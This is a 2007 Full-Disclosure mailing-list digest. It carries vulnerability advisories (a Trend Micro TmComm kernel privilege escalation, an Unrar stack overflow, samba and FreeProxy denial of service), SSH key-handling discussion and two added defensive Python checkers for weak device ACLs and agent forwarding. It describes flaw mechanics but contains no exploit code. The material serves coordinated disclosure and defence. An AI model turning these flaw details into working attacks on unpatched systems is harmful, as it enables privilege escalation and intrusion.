It may not be edited in any way without the express written consent of
iDefense. If you wish to reprint the whole or any part of this alert in
any other medium other than electronically, please e-mail
[EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at
the time of publishing based on currently available information. Use of
the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on, this
information.



[Full-disclosure] iDefense Security Advisory 02.07.07: Trend Micro TmComm Local Privilege Escalation Vulnerability

2007-02-07 Thread iDefense Labs
Trend Micro TmComm Local Privilege Escalation Vulnerability

iDefense Security Advisory 02.07.07
http://labs.idefense.com/intelligence/vulnerabilities/
Feb 07, 2007

I. BACKGROUND

The Trend Micro AntiVirus scan engine is widely relied upon to provide
AntiVirus capabilities to desktop, server, and gateway systems. The engine
is licensed to several of Trend Micro's OEM partners. More information is
available on Trend Micro's web site at the following URL.

http://www.trendmicro.com/

II. DESCRIPTION

Local exploitation of an input validation vulnerability within version
1.5.0.1052 of TmComm.sys as included with Trend Micro's AntiVirus engine
could allow an attacker to execute arbitrary code in kernel context.

This vulnerability specifically exists due to insecure permissions on the
\\.\TmComm DOS device interface. The permissions on this device allow
"Everyone" write access. This could allow a locally logged in user to
access functionality via IOCTLs which was designed for privileged use
only.

Additionally, the IOCTL handlers for this DOS device interface do not
validate addresses passed to them. As such, it is possible to overwrite
arbitrary memory or execute attacker-supplied code in the context of the
kernel (RING 0).

III. ANALYSIS

Exploitation allows an attacker to elevate privileges by overwriting
arbitrary system memory or executing code within kernel context.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in our
vulnerability lab. The configuration at verification time was as follows:

 * Trend Micro's PC-Cillin Internet Security 2007
 * TmComm.sys version 1.5.0.1052
 * VsapiNI.sys (scan engine) version 3.320.0.1003

All products using Trend Micro's scan engine should be considered
vulnerable.

V. WORKAROUND

Removing write permissions for "Everyone" appears to prevent access to the
vulnerable code. iDefense confirmed that the virus scanning engine was
still able to detect viruses. Although no side effects were witnessed in
Lab tests, normal functionality may be hindered.

VI. VENDOR RESPONSE

"To address this vulnerability, Trend Micro recommends that customers
update their Anti-Rootkit Common Module to version 1.600-1052.

Products that are set to Automatic Update will be updated immediately.

Manual Updating can also be performed by using the product's "Update
Now" function."

More information is available in Trend Micro's knowledge base at the link
shown below.

http://esupport.trendmicro.com/support/viewxml.do?ContentID=EN-1034432&id=EN-1034432

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

01/17/2007  Initial vendor notification
01/19/2007  Initial vendor response
02/07/2007  Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Ruben Santamarta of
reversemode.com.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically.
It may not be edited in any way without the express written consent of
iDefense. If you wish to reprint the whole or any part of this alert in
any other medium other than electronically, please e-mail
[EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at
the time of publishing based on currently available information. Use of
the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on, this
information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
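A defender-side check for the class of misconfiguration the advisory describes, added here and not taken from iDefense or Trend Micro: given a device object's DACL in SDDL form, it lists the access-allowed ACEs that hand write or full control to Everyone or other broad groups, which is what the workaround (dropping Everyone's write access) removes. The SDDL strings are constructed samples, not the real DACL of TmComm.sys; a real DACL has to be exported with a tool that can read kernel object security.

```python
import re

# Principal abbreviations / SIDs that mean "any local user" (constructed list).
BROAD_PRINCIPALS = {
    "WD": "Everyone", "S-1-1-0": "Everyone",
    "AU": "Authenticated Users", "S-1-5-11": "Authenticated Users",
    "BU": "Users", "IU": "Interactive",
}
# Two-letter SDDL rights that allow writing to or taking control of the object
# (in a rights field "WD"/"WO" mean WRITE_DAC/WRITE_OWNER, not the Everyone SID).
WRITE_CODES = {"GA", "GW", "FA", "FW", "WD", "WO"}
# Equivalent bits for numeric masks: GENERIC_ALL, GENERIC_WRITE, WRITE_OWNER,
# WRITE_DAC, FILE_WRITE_DATA, FILE_APPEND_DATA.
WRITE_MASK = 0x10000000 | 0x40000000 | 0x00080000 | 0x00040000 | 0x2 | 0x4

ACE_RE = re.compile(r"\(([^)]*)\)")
DACL_RE = re.compile(r"D:[A-Z]*((?:\([^)]*\))*)")


def grants_write(rights):
    """True if an ACE rights field (letter codes or 0x mask) permits writing."""
    if rights.lower().startswith("0x"):
        return (int(rights, 16) & WRITE_MASK) != 0
    codes = {rights[i:i + 2] for i in range(0, len(rights), 2)}
    return bool(codes & WRITE_CODES)


def broad_write_aces(sddl):
    """Return (principal, rights) for every access-allowed ACE in the DACL
    that gives a broad principal write or full control."""
    match = DACL_RE.search(sddl)
    if not match:
        return []
    findings = []
    for ace in ACE_RE.findall(match.group(1)):
        fields = ace.split(";")  # type;flags;rights;object;inherit_object;sid
        if len(fields) < 6:
            continue
        ace_type, rights, sid = fields[0], fields[2], fields[5]
        if ace_type == "A" and sid in BROAD_PRINCIPALS and grants_write(rights):
            findings.append((BROAD_PRINCIPALS[sid], rights))
    return findings


# Constructed samples, not the real TmComm DACL: the first has the shape the
# advisory describes (Everyone with full control), the second the shape the
# workaround aims for (Everyone reduced to read; SYSTEM/Administrators keep all).
WEAK_SDDL = "D:(A;;GA;;;WD)(A;;GA;;;SY)(A;;GA;;;BA)"
HARDENED_SDDL = "D:P(A;;GR;;;WD)(A;;GA;;;SY)(A;;GA;;;BA)"

if __name__ == "__main__":
    for name, sddl in (("weak", WEAK_SDDL), ("hardened", HARDENED_SDDL)):
        print(name, broad_write_aces(sddl) or "no broad write access")
```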


[Full-disclosure] iDefense Security Advisory 02.07.07: RARLabs Unrar Password Prompt Buffer Overflow Vulnerability

2007-02-07 Thread iDefense Labs
RARLabs Unrar Password Prompt Buffer Overflow Vulnerability

iDefense Security Advisory 02.07.07
http://labs.idefense.com/intelligence/vulnerabilities/
Feb 07, 2007

I. BACKGROUND

Unrar is a command line archive extractor for Windows and Linux. For more
information visit the vendor's site at the URL shown below.

http://www.rarlabs.com/

II. DESCRIPTION

Remote exploitation of a stack based buffer overflow vulnerability in
RARLabs Unrar may allow an attacker to execute arbitrary code with the
privileges of the user opening the archive.

Unrar is prone to a stack based buffer overflow when processing specially
crafted password protected archives.

III. ANALYSIS

Exploitation of the vulnerability could allow an attacker to execute
arbitrary code with the privileges of the user opening the file.
Exploitation would require that an attacker host a maliciously crafted
document on a website and entice users to visit the site. An attacker
could also e-mail the malicious document and use social engineering
techniques to trick the e-mail recipient into opening the document.

There are several mitigating factors for this vulnerability. Nearly all
Windows users will use the GUI based WinRAR to open archives, and it is
not vulnerable. If users are using the vulnerable command line based
unrar, they still need to interact with the program in order to trigger
the vulnerability. They must respond to the prompt asking for the
password, after which the vulnerability will be triggered. They do not
need to enter a correct password, but they must at least push the enter
key.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in version 3.60
for Linux and 3.61 for Windows. Previous versions may also be affected.

V. WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

RARLabs has addressed this vulnerability with the version 3.70 beta release
of WinRAR.

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

12/12/2006  Initial vendor notification
01/09/2007  Initial vendor response
02/07/2007  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.



Re: [Full-disclosure] PS Information Leak on HP True64 Alpha OSF1 v5.1 1885

2007-02-07 Thread Andrea Purificato - bunker
At 21:05, Tuesday 6 February 2007, you wrote:

> I would guess the behavior you just discovered has been
> known for a long time.

It doesn't mean that things will always be that way :-)
See here: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102215-1

> PS: Why should ps to work correctly without the setuid bit?

because all recent "ps" implementations work without it, and removing the bit
from the executable is not a workaround in this case.
Maybe it's time to abandon the stone age :-)


Bye,
-- 
Andrea "bunker" Purificato
+++[>++>+>
++<<<-]>.>++.>.<--.>-.<+++.

http://rawlab.mindcreations.com 



Re: [Full-disclosure] AP report: Hackers attack key Net traffic computers

2007-02-07 Thread Simon Smith
Amen!


On 2/6/07 9:56 PM, "James Matthews" <[EMAIL PROTECTED]> wrote:

> Yes they hit the .org servers! Maybe this is a little wake up call for all the
> people that don't put money into computer security!
> 
> On 2/6/07, Juha-Matti Laurio  <[EMAIL PROTECTED]> wrote:
>> According to
>> http://seattlepi.nwsource.com/business/1700AP_Internet_Attacks.html
>> 
>> "Experts said the unusually powerful attacks lasted for hours but passed
>> largely unnoticed by most computer users, a testament to the resiliency of
>> the Internet." 
>> 
>> Public CERT sources are pointing to this TEAM CYMRU's DNS Name Server Status
>> Summary page too:
>> http://www.cymru.com/monitoring/dnssumm/index.html
>> 
>> 
>> - Juha-Matti
>> 



Re: [Full-disclosure] [Full-Disclosure] (Psexec on *NIX)

2007-02-07 Thread Siim Põder
Yo!

Stan Bubrouski wrote:
> On 2/2/07, Tyop? <[EMAIL PROTECTED]> wrote:
>> key-based login without passphrase is like eating cheese without
>> bread. useless (IMHO).
>>
> 
> Totally, if someone compromises the machine and gets root they get all
> your keys and without a passphrase... yeah no good.

If someone compromises the machine and gets root, your keys are very
likely to be compromised anyway. Root can easily trojan your ssh/ssh-agent
and retrieve the keys.

Same goes for passwords (although they have to be picked one at a time).


Realistically, it is a pain to have different passwords for all the
different boxes. You can remember maybe something like 25 or so
passwords if they are complex (if you do better than that, I'm happy for you),
so you could probably use that if you are managing that kind of number
of different boxes (or sets of similar boxes, if you use the same
password in some cases).

Also, with passwords you have to type them in when you log in to other
machines, so it's possible to lose the password if any host in the chain
is compromised - which is not the case for key auth and agent forwarding.

For key auth and agent forwarding, the issue is that your keys could be
used (not read) while your agent is forwarded.


Now, I presume that I can keep my computer from being compromised. If I
can't do that, I am fucked anyway. I keep the keys in my computer.

Next, I create two sets of private keys: one that I use for user
accounts on "gateway hosts" (to get to the machines not directly
accessible), which I ssh-add to my ssh-agent and allow anyone to use.

The second key is used for accounts that I can get root with and I add
them with ssh-add -c so that I would be alerted every time their usage
is requested (SSH_ASKPASS). I forward the agent only to those gateway hosts.

The alert box pops up on my screen with the default "Confirm" button
selected, so I have to do an extra enter keypress for each logon. You
could require some sort of easy password to be typed into the confirmation
box, so that some clever hacker couldn't monitor a remote session of
yours and make his login attempt exactly when you are about to press
enter anyway.


I think it's pretty solid and also comfortable, what do you think?

Siim Põder

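The setup described in the post above, as an added example that is not the poster's own files: a check that an ssh_config only enables agent forwarding for the named gateway hosts, plus the two ssh-add invocations (the root-capable key loaded with -c so each use needs confirmation). Host names, key paths and the config text are constructed placeholders.

```python
import os
import subprocess

# Constructed ssh_config: forwarding only to the two gateway hosts, off
# everywhere else, and the gateway key offered only on those hosts.
GOOD_CONFIG = """
Host gw1 gw2
    ForwardAgent yes
    IdentityFile ~/.ssh/id_gateway
Host *
    ForwardAgent no
    IdentitiesOnly yes
"""
# Constructed config with the mistake to catch: forwarding enabled globally.
BAD_CONFIG = """
ForwardAgent yes
Host gw1
    IdentityFile ~/.ssh/id_gateway
"""


def forward_agent_offenders(config, gateways):
    """Return the Host patterns that enable ForwardAgent but are not gateways.
    Directives before the first Host line apply everywhere, i.e. pattern '*'.
    Only the 'keyword value' form of ssh_config lines is handled."""
    gateways = set(gateways)
    patterns = ["*"]
    offenders = []
    for raw in config.splitlines():
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        keyword = parts[0].lower()
        if keyword == "host":
            patterns = parts[1:]
        elif keyword == "forwardagent" and len(parts) > 1 and parts[1].lower() == "yes":
            offenders.extend(p for p in patterns if p not in gateways)
    return offenders


def key_loading_commands(gateway_key, root_key):
    """The post's two-key loading step: the gateway key is added normally, the
    root-capable key with -c so every use must be confirmed (SSH_ASKPASS)."""
    return [["ssh-add", gateway_key], ["ssh-add", "-c", root_key]]


if __name__ == "__main__":
    print("offenders:", forward_agent_offenders(BAD_CONFIG, ["gw1", "gw2"]))
    gw, rt = (os.path.expanduser(p) for p in ("~/.ssh/id_gateway", "~/.ssh/id_root"))
    for cmd in key_loading_commands(gw, rt):
        subprocess.run(cmd, check=False)  # needs a running ssh-agent and the keys
```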


Re: [Full-disclosure] Bluepill's Rutkowska was or is a Man ?!

2007-02-07 Thread bambam
I second that. Bluepill and her other work are awesome and I couldn't
give a toss if they were written by a Martian with three heads.

Just drop it dude and do something else.

On 2/6/07, Michal Zalewski <[EMAIL PROTECTED]> wrote:
> On Tue, 6 Feb 2007 [EMAIL PROTECTED] wrote:
>
> > What is going on ? Is that true ? Any one knows ?
>
> That dude is clearly quite determined to debate this like a matter of
> (inter?)national security, on Wikipedia and elsewhere, but it is getting
> oddly inappropriate.
>
> Get a life and let go.
>
> /mz
>


-- 
"We have Ph.D.s here who know the stuff cold, and we don't believe
it's possible to protect digital content" -- Steve Jobs

you'll never survive choosing sides against the wretched of the earth



[Full-disclosure] Useful technique when performing XSS

2007-02-07 Thread pdp (architect)
http://www.gnucitizen.org/blog/playing-in-large

Basically this article is about how to squeeze more data into a size-
restricted, unsanitized field. This technique can also be used to hide
attackers' activities.

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org



[Full-disclosure] rPSA-2007-0026-1 samba samba-swat

2007-02-07 Thread rPath Update Announcements
rPath Security Advisory: 2007-0026-1
Published: 2007-02-07
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
Local Deterministic Denial of Service
Updated Versions:
samba=/[EMAIL PROTECTED]:devel//1/3.0.24-0.1-1
samba-swat=/[EMAIL PROTECTED]:devel//1/3.0.24-0.1-1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0452
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0453
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0454
https://issues.rpath.com/browse/RPL-1005

Description:
Previous versions of the samba package are vulnerable to a Denial
of Service attack from authenticated users only (CVE-2007-0452).
Two other vulnerabilities resolved in samba 3.0.24 do not apply
to rPath Linux 1 (CVE-2007-0453 and CVE-2007-0454).



[Full-disclosure] Medium level security hole in FreeProxy

2007-02-07 Thread Tim Brown
The FreeProxy HTTP proxy server suffers from a denial of service condition 
which causes the server to hang.  This occurs when an attacker makes a 
request for the hostname/portnumber combination in use by the server itself.  
The vendor was notified on the 10th January 2007 and a fix was made available 
on the 24th.  Full details can be found in the attached advisory.
-- 
Tim Brown




NDSA20070206.txt.asc
Description: application/pgp-keys

[Full-disclosure] Zomg is vulnerable to singing drivers

2007-02-07 Thread n33td33v
http://www.youtube.com/watch?v=26islwX1mRY


zomg



